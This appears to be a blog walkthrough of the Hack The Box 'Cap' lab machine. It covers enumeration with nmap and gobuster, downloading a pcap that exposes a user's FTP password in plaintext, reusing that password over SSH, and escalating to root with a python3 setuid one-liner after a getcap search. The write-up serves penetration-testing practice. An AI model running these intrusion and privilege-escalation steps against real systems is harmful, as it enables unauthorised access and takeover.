top of page
Search

Cap

  • Admin
  • Jan 7, 2022
  • 1 min read

Updated: Jul 10, 2023


Enumeration



nmap -sV 10.129.228.42

ree


Port 80 is open. Let's check it by entering the IP address in our browser.

ree


gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42
ree

Now let's open our browser again and check:

10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat

10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0


If you type 10.129.228.42/data/0 in your browser, you find a file to download.

ree

Download the file. It is called 0.pcap


Looks like a pcap file, so let's open Wireshark and look more into it.


In Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark

ree


Once Wireshark loads, Click on File --> Open

ree

Locate your 0.pcap file and click on open


ree

In the filter field, type FTP to filter only the FTP protocol. We can see the password used by Nathan in plaintext!

ree

Foothold


We know that ssh is open too so let's try that:

ssh nathan@10.129.228.42
ree

You are prompted to enter a password. Enter the password we just found.


The credentials worked and we are in.

ree

ls
ree

cat user.txt
ree

You got your flag!



Privilege Escalation


id
ree

getcap -r / 2>/dev/null
ree

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
ree

Now we are root!


id
ree


ls
ree


cd /root
ree

ls
ree

cat root.txt
ree

Now we got the root flag too!


Congratulations!





Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page